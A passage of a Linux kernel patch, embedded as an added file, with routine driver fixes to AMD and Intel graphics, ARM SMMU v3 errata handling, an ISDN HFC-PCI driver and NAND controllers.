+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -351,6 +351,19 @@ static inline bool is_dc_timing_adjust_needed(struct dm_crtc_state *old_state,
+ 		return false;
+ }
+ 
++static inline void reverse_planes_order(struct dc_surface_update *array_of_surface_update,
++					int planes_count)
++{
++	int i, j;
++	struct dc_surface_update surface_updates_temp;
++
++	for (i = 0, j = planes_count - 1; i < j; i++, j--) {
++		surface_updates_temp = array_of_surface_update[i];
++		array_of_surface_update[i] = array_of_surface_update[j];
++		array_of_surface_update[j] = surface_updates_temp;
++	}
++}
++
+ /**
+  * update_planes_and_stream_adapter() - Send planes to be updated in DC
+  *
+@@ -367,6 +380,8 @@ static inline bool update_planes_and_stream_adapter(struct dc *dc,
+ 						    struct dc_stream_update *stream_update,
+ 						    struct dc_surface_update *array_of_surface_update)
+ {
++	reverse_planes_order(array_of_surface_update, planes_count);
++
+ 	/*
+ 	 * Previous frame finished and HW is ready for optimization.
+ 	 */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 5d53e54ebe90b..c2c6c4587a5ce 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -2092,6 +2092,7 @@ static enum dc_status enable_link_dp_mst(
+ 		struct pipe_ctx *pipe_ctx)
+ {
+ 	struct dc_link *link = pipe_ctx->stream->link;
++	unsigned char mstm_cntl;
+ 
+ 	/* sink signal type after MST branch is MST. Multiple MST sinks
+ 	 * share one link. Link DP PHY is enable or training only once.
+@@ -2100,7 +2101,9 @@ static enum dc_status enable_link_dp_mst(
+ 		return DC_OK;
+ 
+ 	/* clear payload table */
+-	dm_helpers_dp_mst_clear_payload_allocation_table(link->ctx, link);
++	core_link_read_dpcd(link, DP_MSTM_CTRL, &mstm_cntl, 1);
++	if (mstm_cntl & DP_MST_EN)
++		dm_helpers_dp_mst_clear_payload_allocation_table(link->ctx, link);
+ 
+ 	/* to make sure the pending down rep can be processed
+ 	 * before enabling the link
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index ff855cb21d3f9..bbe1337a8cee3 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -705,20 +705,65 @@ struct atom_gpio_pin_lut_v2_1
+ };
+ 
+ 
+-/* 
+-  ***************************************************************************
+-    Data Table vram_usagebyfirmware  structure
+-  ***************************************************************************
+-*/
++/*
++ * VBIOS/PRE-OS always reserve a FB region at the top of frame buffer. driver should not write
++ * access that region. driver can allocate their own reservation region as long as it does not
++ * overlap firwmare's reservation region.
++ * if (pre-NV1X) atom data table firmwareInfoTable version < 3.3:
++ * in this case, atom data table vram_usagebyfirmwareTable version always <= 2.1
++ *   if VBIOS/UEFI GOP is posted:
++ *     VBIOS/UEFIGOP update used_by_firmware_in_kb = total reserved size by VBIOS
++ *     update start_address_in_kb = total_mem_size_in_kb - used_by_firmware_in_kb;
++ *     ( total_mem_size_in_kb = reg(CONFIG_MEMSIZE)<<10)
++ *     driver can allocate driver reservation region under firmware reservation,
++ *     used_by_driver_in_kb = driver reservation size
++ *     driver reservation start address =  (start_address_in_kb - used_by_driver_in_kb)
++ *     Comment1[hchan]: There is only one reservation at the beginning of the FB reserved by
++ *     host driver. Host driver would overwrite the table with the following
++ *     used_by_firmware_in_kb = total reserved size for pf-vf info exchange and
++ *     set SRIOV_MSG_SHARE_RESERVATION mask start_address_in_kb = 0
++ *   else there is no VBIOS reservation region:
++ *     driver must allocate driver reservation region at top of FB.
++ *     driver set used_by_driver_in_kb = driver reservation size
++ *     driver reservation start address =  (total_mem_size_in_kb - used_by_driver_in_kb)
++ *     same as Comment1
++ * else (NV1X and after):
++ *   if VBIOS/UEFI GOP is posted:
++ *     VBIOS/UEFIGOP update:
++ *       used_by_firmware_in_kb = atom_firmware_Info_v3_3.fw_reserved_size_in_kb;
++ *       start_address_in_kb = total_mem_size_in_kb - used_by_firmware_in_kb;
++ *       (total_mem_size_in_kb = reg(CONFIG_MEMSIZE)<<10)
++ *   if vram_usagebyfirmwareTable version <= 2.1:
++ *     driver can allocate driver reservation region under firmware reservation,
++ *     driver set used_by_driver_in_kb = driver reservation size
++ *     driver reservation start address = start_address_in_kb - used_by_driver_in_kb
++ *     same as Comment1
++ *   else driver can:
++ *     allocate it reservation any place as long as it does overlap pre-OS FW reservation area
++ *     set used_by_driver_region0_in_kb = driver reservation size
++ *     set driver_region0_start_address_in_kb =  driver reservation region start address
++ *     Comment2[hchan]: Host driver can set used_by_firmware_in_kb and start_address_in_kb to
++ *     zero as the reservation for VF as it doesn’t exist.  And Host driver should also
++ *     update atom_firmware_Info table to remove the same VBIOS reservation as well.
++ */
+ 
+ struct vram_usagebyfirmware_v2_1
+ {
+-  struct  atom_common_table_header  table_header;
+-  uint32_t  start_address_in_kb;
+-  uint16_t  used_by_firmware_in_kb;
+-  uint16_t  used_by_driver_in_kb; 
++	struct  atom_common_table_header  table_header;
++	uint32_t  start_address_in_kb;
++	uint16_t  used_by_firmware_in_kb;
++	uint16_t  used_by_driver_in_kb;
+ };
+ 
++struct vram_usagebyfirmware_v2_2 {
++	struct  atom_common_table_header  table_header;
++	uint32_t  fw_region_start_address_in_kb;
++	uint16_t  used_by_firmware_in_kb;
++	uint16_t  reserved;
++	uint32_t  driver_region0_start_address_in_kb;
++	uint32_t  used_by_driver_region0_in_kb;
++	uint32_t  reserved32[7];
++};
+ 
+ /* 
+   ***************************************************************************
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index da9b995b54c8f..96e679a176e94 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -7123,8 +7123,6 @@ static void intel_update_crtc(struct intel_atomic_state *state,
+ 
+ 	intel_fbc_update(state, crtc);
+ 
+-	drm_WARN_ON(&i915->drm, !intel_display_power_is_enabled(i915, POWER_DOMAIN_DC_OFF));
+-
+ 	if (!modeset &&
+ 	    (new_crtc_state->uapi.color_mgmt_changed ||
+ 	     new_crtc_state->update_pipe))
+@@ -7501,28 +7499,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 	drm_atomic_helper_wait_for_dependencies(&state->base);
+ 	drm_dp_mst_atomic_wait_for_dependencies(&state->base);
+ 
+-	/*
+-	 * During full modesets we write a lot of registers, wait
+-	 * for PLLs, etc. Doing that while DC states are enabled
+-	 * is not a good idea.
+-	 *
+-	 * During fastsets and other updates we also need to
+-	 * disable DC states due to the following scenario:
+-	 * 1. DC5 exit and PSR exit happen
+-	 * 2. Some or all _noarm() registers are written
+-	 * 3. Due to some long delay PSR is re-entered
+-	 * 4. DC5 entry -> DMC saves the already written new
+-	 *    _noarm() registers and the old not yet written
+-	 *    _arm() registers
+-	 * 5. DC5 exit -> DMC restores a mixture of old and
+-	 *    new register values and arms the update
+-	 * 6. PSR exit -> hardware latches a mixture of old and
+-	 *    new register values -> corrupted frame, or worse
+-	 * 7. New _arm() registers are finally written
+-	 * 8. Hardware finally latches a complete set of new
+-	 *    register values, and subsequent frames will be OK again
+-	 */
+-	wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_DC_OFF);
++	if (state->modeset)
++		wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_MODESET);
+ 
+ 	intel_atomic_prepare_plane_clear_colors(state);
+ 
+@@ -7661,8 +7639,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * the culprit.
+ 		 */
+ 		intel_uncore_arm_unclaimed_mmio_detection(&dev_priv->uncore);
++		intel_display_power_put(dev_priv, POWER_DOMAIN_MODESET, wakeref);
+ 	}
+-	intel_display_power_put(dev_priv, POWER_DOMAIN_DC_OFF, wakeref);
+ 	intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+index e49fa6fa6aee1..b2838732ac936 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+@@ -256,8 +256,8 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 
+ 		if (!HAS_FLAT_CCS(rq->engine->i915)) {
+ 			/* hsdes: 1809175790 */
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_GFX_CCS_AUX_NV);
++			cs = gen12_emit_aux_table_inv(rq->engine->gt, cs,
++						      GEN12_CCS_AUX_INV);
+ 		}
+ 
+ 		*cs++ = preparser_disable(false);
+@@ -317,10 +317,10 @@ int gen12_emit_flush_xcs(struct i915_request *rq, u32 mode)
+ 	if (aux_inv) { /* hsdes: 1809175790 */
+ 		if (rq->engine->class == VIDEO_DECODE_CLASS)
+ 			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VD0_AUX_NV);
++						      cs, GEN12_VD0_AUX_INV);
+ 		else
+ 			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VE0_AUX_NV);
++						      cs, GEN12_VE0_AUX_INV);
+ 	}
+ 
+ 	if (mode & EMIT_INVALIDATE)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_regs.h b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+index 2275ee47da955..dd006563cc81e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_regs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+@@ -301,9 +301,11 @@
+ #define GEN8_PRIVATE_PAT_HI			_MMIO(0x40e0 + 4)
+ #define GEN10_PAT_INDEX(index)			_MMIO(0x40e0 + (index) * 4)
+ #define BSD_HWS_PGA_GEN7			_MMIO(0x4180)
+-#define GEN12_GFX_CCS_AUX_NV			_MMIO(0x4208)
+-#define GEN12_VD0_AUX_NV			_MMIO(0x4218)
+-#define GEN12_VD1_AUX_NV			_MMIO(0x4228)
++
++#define GEN12_CCS_AUX_INV			_MMIO(0x4208)
++#define GEN12_VD0_AUX_INV			_MMIO(0x4218)
++#define GEN12_VE0_AUX_INV			_MMIO(0x4238)
++#define GEN12_BCS0_AUX_INV			_MMIO(0x4248)
+ 
+ #define GEN8_RTCR				_MMIO(0x4260)
+ #define GEN8_M1TCR				_MMIO(0x4264)
+@@ -311,14 +313,12 @@
+ #define GEN8_BTCR				_MMIO(0x426c)
+ #define GEN8_VTCR				_MMIO(0x4270)
+ 
+-#define GEN12_VD2_AUX_NV			_MMIO(0x4298)
+-#define GEN12_VD3_AUX_NV			_MMIO(0x42a8)
+-#define GEN12_VE0_AUX_NV			_MMIO(0x4238)
+-
+ #define BLT_HWS_PGA_GEN7			_MMIO(0x4280)
+ 
+-#define GEN12_VE1_AUX_NV			_MMIO(0x42b8)
++#define GEN12_VD2_AUX_INV			_MMIO(0x4298)
++#define GEN12_CCS0_AUX_INV			_MMIO(0x42c8)
+ #define   AUX_INV				REG_BIT(0)
++
+ #define VEBOX_HWS_PGA_GEN7			_MMIO(0x4380)
+ 
+ #define GEN12_AUX_ERR_DBG			_MMIO(0x43f4)
+diff --git a/drivers/gpu/drm/i915/gt/intel_lrc.c b/drivers/gpu/drm/i915/gt/intel_lrc.c
+index 3955292483a6f..137e41e37ea54 100644
+--- a/drivers/gpu/drm/i915/gt/intel_lrc.c
++++ b/drivers/gpu/drm/i915/gt/intel_lrc.c
+@@ -1299,7 +1299,7 @@ gen12_emit_indirect_ctx_rcs(const struct intel_context *ce, u32 *cs)
+ 	/* hsdes: 1809175790 */
+ 	if (!HAS_FLAT_CCS(ce->engine->i915))
+ 		cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-					      cs, GEN12_GFX_CCS_AUX_NV);
++					      cs, GEN12_CCS_AUX_INV);
+ 
+ 	/* Wa_16014892111 */
+ 	if (IS_DG2(ce->engine->i915))
+@@ -1326,10 +1326,10 @@ gen12_emit_indirect_ctx_xcs(const struct intel_context *ce, u32 *cs)
+ 	if (!HAS_FLAT_CCS(ce->engine->i915)) {
+ 		if (ce->engine->class == VIDEO_DECODE_CLASS)
+ 			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VD0_AUX_NV);
++						      cs, GEN12_VD0_AUX_INV);
+ 		else if (ce->engine->class == VIDEO_ENHANCEMENT_CLASS)
+ 			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VE0_AUX_NV);
++						      cs, GEN12_VE0_AUX_INV);
+ 	}
+ 
+ 	return cs;
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index 8ef93889061a6..5ec293011d990 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -449,8 +449,11 @@ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ 		}
+ 	} while (unlikely(is_barrier(active)));
+ 
+-	if (!__i915_active_fence_set(active, fence))
++	fence = __i915_active_fence_set(active, fence);
++	if (!fence)
+ 		__i915_active_acquire(ref);
++	else
++		dma_fence_put(fence);
+ 
+ out:
+ 	i915_active_release(ref);
+@@ -469,13 +472,9 @@ __i915_active_set_fence(struct i915_active *ref,
+ 		return NULL;
+ 	}
+ 
+-	rcu_read_lock();
+ 	prev = __i915_active_fence_set(active, fence);
+-	if (prev)
+-		prev = dma_fence_get_rcu(prev);
+-	else
++	if (!prev)
+ 		__i915_active_acquire(ref);
+-	rcu_read_unlock();
+ 
+ 	return prev;
+ }
+@@ -1019,10 +1018,11 @@ void i915_request_add_active_barriers(struct i915_request *rq)
+  *
+  * Records the new @fence as the last active fence along its timeline in
+  * this active tracker, moving the tracking callbacks from the previous
+- * fence onto this one. Returns the previous fence (if not already completed),
+- * which the caller must ensure is executed before the new fence. To ensure
+- * that the order of fences within the timeline of the i915_active_fence is
+- * understood, it should be locked by the caller.
++ * fence onto this one. Gets and returns a reference to the previous fence
++ * (if not already completed), which the caller must put after making sure
++ * that it is executed before the new fence. To ensure that the order of
++ * fences within the timeline of the i915_active_fence is understood, it
++ * should be locked by the caller.
+  */
+ struct dma_fence *
+ __i915_active_fence_set(struct i915_active_fence *active,
+@@ -1031,7 +1031,23 @@ __i915_active_fence_set(struct i915_active_fence *active,
+ 	struct dma_fence *prev;
+ 	unsigned long flags;
+ 
+-	if (fence == rcu_access_pointer(active->fence))
++	/*
++	 * In case of fences embedded in i915_requests, their memory is
++	 * SLAB_FAILSAFE_BY_RCU, then it can be reused right after release
++	 * by new requests.  Then, there is a risk of passing back a pointer
++	 * to a new, completely unrelated fence that reuses the same memory
++	 * while tracked under a different active tracker.  Combined with i915
++	 * perf open/close operations that build await dependencies between
++	 * engine kernel context requests and user requests from different
++	 * timelines, this can lead to dependency loops and infinite waits.
++	 *
++	 * As a countermeasure, we try to get a reference to the active->fence
++	 * first, so if we succeed and pass it back to our user then it is not
++	 * released and potentially reused by an unrelated request before the
++	 * user has a chance to set up an await dependency on it.
++	 */
++	prev = i915_active_fence_get(active);
++	if (fence == prev)
+ 		return fence;
+ 
+ 	GEM_BUG_ON(test_bit(DMA_FENCE_FLAG_SIGNALED_BIT, &fence->flags));
+@@ -1040,27 +1056,56 @@ __i915_active_fence_set(struct i915_active_fence *active,
+ 	 * Consider that we have two threads arriving (A and B), with
+ 	 * C already resident as the active->fence.
+ 	 *
+-	 * A does the xchg first, and so it sees C or NULL depending
+-	 * on the timing of the interrupt handler. If it is NULL, the
+-	 * previous fence must have been signaled and we know that
+-	 * we are first on the timeline. If it is still present,
+-	 * we acquire the lock on that fence and serialise with the interrupt
+-	 * handler, in the process removing it from any future interrupt
+-	 * callback. A will then wait on C before executing (if present).
+-	 *
+-	 * As B is second, it sees A as the previous fence and so waits for
+-	 * it to complete its transition and takes over the occupancy for
+-	 * itself -- remembering that it needs to wait on A before executing.
++	 * Both A and B have got a reference to C or NULL, depending on the
++	 * timing of the interrupt handler.  Let's assume that if A has got C
++	 * then it has locked C first (before B).
+ 	 *
+ 	 * Note the strong ordering of the timeline also provides consistent
+ 	 * nesting rules for the fence->lock; the inner lock is always the
+ 	 * older lock.
+ 	 */
+ 	spin_lock_irqsave(fence->lock, flags);
+-	prev = xchg(__active_fence_slot(active), fence);
+-	if (prev) {
+-		GEM_BUG_ON(prev == fence);
++	if (prev)
+ 		spin_lock_nested(prev->lock, SINGLE_DEPTH_NESTING);
++
++	/*
++	 * A does the cmpxchg first, and so it sees C or NULL, as before, or
++	 * something else, depending on the timing of other threads and/or
++	 * interrupt handler.  If not the same as before then A unlocks C if
++	 * applicable and retries, starting from an attempt to get a new
++	 * active->fence.  Meanwhile, B follows the same path as A.
++	 * Once A succeeds with cmpxch, B fails again, retires, gets A from
++	 * active->fence, locks it as soon as A completes, and possibly
++	 * succeeds with cmpxchg.
++	 */
++	while (cmpxchg(__active_fence_slot(active), prev, fence) != prev) {
++		if (prev) {
++			spin_unlock(prev->lock);
++			dma_fence_put(prev);
++		}
++		spin_unlock_irqrestore(fence->lock, flags);
++
++		prev = i915_active_fence_get(active);
++		GEM_BUG_ON(prev == fence);
++
++		spin_lock_irqsave(fence->lock, flags);
++		if (prev)
++			spin_lock_nested(prev->lock, SINGLE_DEPTH_NESTING);
++	}
++
++	/*
++	 * If prev is NULL then the previous fence must have been signaled
++	 * and we know that we are first on the timeline.  If it is still
++	 * present then, having the lock on that fence already acquired, we
++	 * serialise with the interrupt handler, in the process of removing it
++	 * from any future interrupt callback.  A will then wait on C before
++	 * executing (if present).
++	 *
++	 * As B is second, it sees A as the previous fence and so waits for
++	 * it to complete its transition and takes over the occupancy for
++	 * itself -- remembering that it needs to wait on A before executing.
++	 */
++	if (prev) {
+ 		__list_del_entry(&active->cb.node);
+ 		spin_unlock(prev->lock); /* serialise with prev->cb_list */
+ 	}
+@@ -1077,11 +1122,7 @@ int i915_active_fence_set(struct i915_active_fence *active,
+ 	int err = 0;
+ 
+ 	/* Must maintain timeline ordering wrt previous active requests */
+-	rcu_read_lock();
+ 	fence = __i915_active_fence_set(active, &rq->fence);
+-	if (fence) /* but the previous fence may not belong to that timeline! */
+-		fence = dma_fence_get_rcu(fence);
+-	rcu_read_unlock();
+ 	if (fence) {
+ 		err = i915_request_await_dma_fence(rq, fence);
+ 		dma_fence_put(fence);
+diff --git a/drivers/gpu/drm/i915/i915_request.c b/drivers/gpu/drm/i915/i915_request.c
+index 62fad16a55e84..803cd2ad4deb5 100644
+--- a/drivers/gpu/drm/i915/i915_request.c
++++ b/drivers/gpu/drm/i915/i915_request.c
+@@ -1647,6 +1647,11 @@ __i915_request_ensure_parallel_ordering(struct i915_request *rq,
+ 
+ 	request_to_parent(rq)->parallel.last_rq = i915_request_get(rq);
+ 
++	/*
++	 * Users have to put a reference potentially got by
++	 * __i915_active_fence_set() to the returned request
++	 * when no longer needed
++	 */
+ 	return to_request(__i915_active_fence_set(&timeline->last_request,
+ 						  &rq->fence));
+ }
+@@ -1693,6 +1698,10 @@ __i915_request_ensure_ordering(struct i915_request *rq,
+ 							 0);
+ 	}
+ 
++	/*
++	 * Users have to put the reference to prev potentially got
++	 * by __i915_active_fence_set() when no longer needed
++	 */
+ 	return prev;
+ }
+ 
+@@ -1736,6 +1745,8 @@ __i915_request_add_to_timeline(struct i915_request *rq)
+ 		prev = __i915_request_ensure_ordering(rq, timeline);
+ 	else
+ 		prev = __i915_request_ensure_parallel_ordering(rq, timeline);
++	if (prev)
++		i915_request_put(prev);
+ 
+ 	/*
+ 	 * Make sure that no request gazumped us - if it was allocated after
+diff --git a/drivers/gpu/drm/imx/ipuv3-crtc.c b/drivers/gpu/drm/imx/ipuv3-crtc.c
+index 5f26090b0c985..89585b31b985e 100644
+--- a/drivers/gpu/drm/imx/ipuv3-crtc.c
++++ b/drivers/gpu/drm/imx/ipuv3-crtc.c
+@@ -310,7 +310,7 @@ static void ipu_crtc_mode_set_nofb(struct drm_crtc *crtc)
+ 		dev_warn(ipu_crtc->dev, "8-pixel align hactive %d -> %d\n",
+ 			 sig_cfg.mode.hactive, new_hactive);
+ 
+-		sig_cfg.mode.hfront_porch = new_hactive - sig_cfg.mode.hactive;
++		sig_cfg.mode.hfront_porch -= new_hactive - sig_cfg.mode.hactive;
+ 		sig_cfg.mode.hactive = new_hactive;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_bo.c b/drivers/gpu/drm/ttm/ttm_bo.c
+index f7aeeee6f5266..db332de134f1c 100644
+--- a/drivers/gpu/drm/ttm/ttm_bo.c
++++ b/drivers/gpu/drm/ttm/ttm_bo.c
+@@ -552,7 +552,8 @@ static bool ttm_bo_evict_swapout_allowable(struct ttm_buffer_object *bo,
+ 
+ 	if (bo->pin_count) {
+ 		*locked = false;
+-		*busy = false;
++		if (busy)
++			*busy = false;
+ 		return false;
+ 	}
+ 
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index d4d8bfee9febc..db33dc87f69ed 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -882,6 +882,12 @@ static void arm_smmu_cmdq_batch_add(struct arm_smmu_device *smmu,
+ {
+ 	int index;
+ 
++	if (cmds->num == CMDQ_BATCH_ENTRIES - 1 &&
++	    (smmu->options & ARM_SMMU_OPT_CMDQ_FORCE_SYNC)) {
++		arm_smmu_cmdq_issue_cmdlist(smmu, cmds->cmds, cmds->num, true);
++		cmds->num = 0;
++	}
++
+ 	if (cmds->num == CMDQ_BATCH_ENTRIES) {
+ 		arm_smmu_cmdq_issue_cmdlist(smmu, cmds->cmds, cmds->num, false);
+ 		cmds->num = 0;
+@@ -3410,6 +3416,44 @@ static int arm_smmu_device_reset(struct arm_smmu_device *smmu, bool bypass)
+ 	return 0;
+ }
+ 
++#define IIDR_IMPLEMENTER_ARM		0x43b
++#define IIDR_PRODUCTID_ARM_MMU_600	0x483
++#define IIDR_PRODUCTID_ARM_MMU_700	0x487
++
++static void arm_smmu_device_iidr_probe(struct arm_smmu_device *smmu)
++{
++	u32 reg;
++	unsigned int implementer, productid, variant, revision;
++
++	reg = readl_relaxed(smmu->base + ARM_SMMU_IIDR);
++	implementer = FIELD_GET(IIDR_IMPLEMENTER, reg);
++	productid = FIELD_GET(IIDR_PRODUCTID, reg);
++	variant = FIELD_GET(IIDR_VARIANT, reg);
++	revision = FIELD_GET(IIDR_REVISION, reg);
++
++	switch (implementer) {
++	case IIDR_IMPLEMENTER_ARM:
++		switch (productid) {
++		case IIDR_PRODUCTID_ARM_MMU_600:
++			/* Arm erratum 1076982 */
++			if (variant == 0 && revision <= 2)
++				smmu->features &= ~ARM_SMMU_FEAT_SEV;
++			/* Arm erratum 1209401 */
++			if (variant < 2)
++				smmu->features &= ~ARM_SMMU_FEAT_NESTING;
++			break;
++		case IIDR_PRODUCTID_ARM_MMU_700:
++			/* Arm erratum 2812531 */
++			smmu->features &= ~ARM_SMMU_FEAT_BTM;
++			smmu->options |= ARM_SMMU_OPT_CMDQ_FORCE_SYNC;
++			/* Arm errata 2268618, 2812531 */
++			smmu->features &= ~ARM_SMMU_FEAT_NESTING;
++			break;
++		}
++		break;
++	}
++}
++
+ static int arm_smmu_device_hw_probe(struct arm_smmu_device *smmu)
+ {
+ 	u32 reg;
+@@ -3615,6 +3659,12 @@ static int arm_smmu_device_hw_probe(struct arm_smmu_device *smmu)
+ 
+ 	smmu->ias = max(smmu->ias, smmu->oas);
+ 
++	if ((smmu->features & ARM_SMMU_FEAT_TRANS_S1) &&
++	    (smmu->features & ARM_SMMU_FEAT_TRANS_S2))
++		smmu->features |= ARM_SMMU_FEAT_NESTING;
++
++	arm_smmu_device_iidr_probe(smmu);
++
+ 	if (arm_smmu_sva_supported(smmu))
+ 		smmu->features |= ARM_SMMU_FEAT_SVA;
+ 
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h
+index cd48590ada303..d0b207cae1071 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h
+@@ -69,6 +69,12 @@
+ #define IDR5_VAX			GENMASK(11, 10)
+ #define IDR5_VAX_52_BIT			1
+ 
++#define ARM_SMMU_IIDR			0x18
++#define IIDR_PRODUCTID			GENMASK(31, 20)
++#define IIDR_VARIANT			GENMASK(19, 16)
++#define IIDR_REVISION			GENMASK(15, 12)
++#define IIDR_IMPLEMENTER		GENMASK(11, 0)
++
+ #define ARM_SMMU_CR0			0x20
+ #define CR0_ATSCHK			(1 << 4)
+ #define CR0_CMDQEN			(1 << 3)
+@@ -639,11 +645,13 @@ struct arm_smmu_device {
+ #define ARM_SMMU_FEAT_BTM		(1 << 16)
+ #define ARM_SMMU_FEAT_SVA		(1 << 17)
+ #define ARM_SMMU_FEAT_E2H		(1 << 18)
++#define ARM_SMMU_FEAT_NESTING		(1 << 19)
+ 	u32				features;
+ 
+ #define ARM_SMMU_OPT_SKIP_PREFETCH	(1 << 0)
+ #define ARM_SMMU_OPT_PAGE0_REGS_ONLY	(1 << 1)
+ #define ARM_SMMU_OPT_MSIPOLL		(1 << 2)
++#define ARM_SMMU_OPT_CMDQ_FORCE_SYNC	(1 << 3)
+ 	u32				options;
+ 
+ 	struct arm_smmu_cmdq		cmdq;
+diff --git a/drivers/isdn/hardware/mISDN/hfcpci.c b/drivers/isdn/hardware/mISDN/hfcpci.c
+index c0331b2680108..fe391de1aba32 100644
+--- a/drivers/isdn/hardware/mISDN/hfcpci.c
++++ b/drivers/isdn/hardware/mISDN/hfcpci.c
+@@ -839,7 +839,7 @@ hfcpci_fill_fifo(struct bchannel *bch)
+ 		*z1t = cpu_to_le16(new_z1);	/* now send data */
+ 		if (bch->tx_idx < bch->tx_skb->len)
+ 			return;
+-		dev_kfree_skb(bch->tx_skb);
++		dev_kfree_skb_any(bch->tx_skb);
+ 		if (get_next_bframe(bch))
+ 			goto next_t_frame;
+ 		return;
+@@ -895,7 +895,7 @@ hfcpci_fill_fifo(struct bchannel *bch)
+ 	}
+ 	bz->za[new_f1].z1 = cpu_to_le16(new_z1);	/* for next buffer */
+ 	bz->f1 = new_f1;	/* next frame */
+-	dev_kfree_skb(bch->tx_skb);
++	dev_kfree_skb_any(bch->tx_skb);
+ 	get_next_bframe(bch);
+ }
+ 
+@@ -1119,7 +1119,7 @@ tx_birq(struct bchannel *bch)
+ 	if (bch->tx_skb && bch->tx_idx < bch->tx_skb->len)
+ 		hfcpci_fill_fifo(bch);
+ 	else {
+-		dev_kfree_skb(bch->tx_skb);
++		dev_kfree_skb_any(bch->tx_skb);
+ 		if (get_next_bframe(bch))
+ 			hfcpci_fill_fifo(bch);
+ 	}
+@@ -2277,7 +2277,7 @@ _hfcpci_softirq(struct device *dev, void *unused)
+ 		return 0;
+ 
+ 	if (hc->hw.int_m2 & HFCPCI_IRQ_ENABLE) {
+-		spin_lock(&hc->lock);
++		spin_lock_irq(&hc->lock);
+ 		bch = Sel_BCS(hc, hc->hw.bswapped ? 2 : 1);
+ 		if (bch && bch->state == ISDN_P_B_RAW) { /* B1 rx&tx */
+ 			main_rec_hfcpci(bch);
+@@ -2288,7 +2288,7 @@ _hfcpci_softirq(struct device *dev, void *unused)
+ 			main_rec_hfcpci(bch);
+ 			tx_birq(bch);
+ 		}
+-		spin_unlock(&hc->lock);
++		spin_unlock_irq(&hc->lock);
+ 	}
+ 	return 0;
+ }
+diff --git a/drivers/mtd/nand/raw/fsl_upm.c b/drivers/mtd/nand/raw/fsl_upm.c
+index b3cc427100a22..636e65328bb32 100644
+--- a/drivers/mtd/nand/raw/fsl_upm.c
++++ b/drivers/mtd/nand/raw/fsl_upm.c
+@@ -135,7 +135,7 @@ static int fun_exec_op(struct nand_chip *chip, const struct nand_operation *op,
+ 	unsigned int i;
+ 	int ret;
+ 
+-	if (op->cs > NAND_MAX_CHIPS)
++	if (op->cs >= NAND_MAX_CHIPS)
+ 		return -EINVAL;
+ 
+ 	if (check_only)
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 029a2a302aa65..ac4947f720478 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -1184,7 +1184,6 @@ static int meson_nand_attach_chip(struct nand_chip *nand)
+ 	struct meson_nfc *nfc = nand_get_controller_data(nand);
+ 	struct meson_nfc_nand_chip *meson_chip = to_meson_nand(nand);
+ 	struct mtd_info *mtd = nand_to_mtd(nand);
+-	int nsectors = mtd->writesize / 1024;
+ 	int ret;
+ 
+ 	if (!mtd->name) {
+@@ -1202,7 +1201,7 @@ static int meson_nand_attach_chip(struct nand_chip *nand)
+ 	nand->options |= NAND_NO_SUBPAGE_WRITE;
+ 
+ 	ret = nand_ecc_choose_conf(nand, nfc->data->ecc_caps,
+-				   mtd->oobsize - 2 * nsectors);
++				   mtd->oobsize - 2);
+ 	if (ret) {
+ 		dev_err(nfc->dev, "failed to ECC init\n");
+ 		return -EINVAL;
